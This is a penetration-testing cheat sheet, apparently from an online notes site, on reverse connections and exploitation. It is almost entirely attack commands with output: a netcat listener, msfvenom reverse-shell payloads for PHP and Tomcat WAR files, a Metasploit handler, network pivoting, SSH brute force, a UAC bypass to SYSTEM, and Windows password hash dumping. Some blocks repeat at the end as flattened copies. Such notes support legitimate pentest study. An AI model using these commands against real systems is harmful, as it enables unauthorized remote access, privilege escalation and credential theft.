Reverse Connection & Exploitation

Netcat

Basic Netcat Command

nc -lnvp <port> [In the Attacker Machine]

Metasploit

Generate PHP reverse shell [msfvenom]

msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.0.1 lport=4444 -o meterpreter.php

$ msfconsole 
msf5> use exploit/multi/handler
msf5 exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf5 exploit(handler)> set payload php/meterpreter_reverse_tcp
msf5 exploit(handler)> set lhost 192.168.0.1
msf5 exploit(handler)> set lport 4444
msf5 exploit(handler)> exploit

Add routing protocols in msfconsole

meterpreter> run autoroute -s 172.16.50.0/24

Use SSH Bruteforce in msfconsole

use auxiliary/scanner/ssh/ssh_login
show options
set rhosts 172.16.50.222
set user_file /usr/share/ncrack/minimal.usr
set pass_file /usr/share/ncrack/minimal.usr
set verbose true
run

View Active sessions

Using sessions command

Interact with sessions using

sessions -i <number>

Background a shell using meterpreter> background command

Note that in modern Windows Operating systems, the User Account Control policy prevents privilege escalation.

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect.

Bypassing UAC

You can bypass that restriction by using the bypassuac module.

meterpreter > background
[*] backgrounding session1 …

msf exploit(handler) > search bypassuac

msf  exploit(handler) > use exploit/windows/local/bypassuac

# Configuring the module

msf exploit(bypassuac) > show options
msf exploit(bypassuac) > set session 1
msf exploit(bypassuac) > exploit

# Bypassing UAC

The new session has the UAC policy disabled, so the getsystem command works !

meterpreter > getuid
Server username: els\\els
meterpreter > getsystem
…got system (via technique 1)

Dumping the Password Database

For example, you can dump the passwords database and save it for an offline cracking session. The hashdump module dumps the password database of a Windows machine

meterpreter > hashdump

msfvenom

Generate .war file for Apache Tomcat reverse shell

msfvenom -p java/jsp_shell_reverse_tcp LHOST=172.16.64.10 LPORT=4444 -f war > reverse.war

Collection of Reverse shell [Commands]

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md

PreviousNull Session Attacks NextInteractive Shell

Last updated 1 year ago

Was this helpful?

$ msfconsole msf5> use exploit/multi/handler msf5 exploit(handler)> set payload windows/meterpreter/reverse_tcp msf5 exploit(handler)> set payload php/meterpreter_reverse_tcp msf5 exploit(handler)> set lhost 192.168.0.1 msf5 exploit(handler)> set lport 4444 msf5 exploit(handler)> exploit

meterpreter > background [*] backgrounding session1 … msf exploit(handler) > search bypassuac msf exploit(handler) > use exploit/windows/local/bypassuac # Configuring the module msf exploit(bypassuac) > show options msf exploit(bypassuac) > set session 1 msf exploit(bypassuac) > exploit # Bypassing UAC The new session has the UAC policy disabled, so the getsystem command works ! meterpreter > getuid Server username: els\\els meterpreter > getsystem …got system (via technique 1)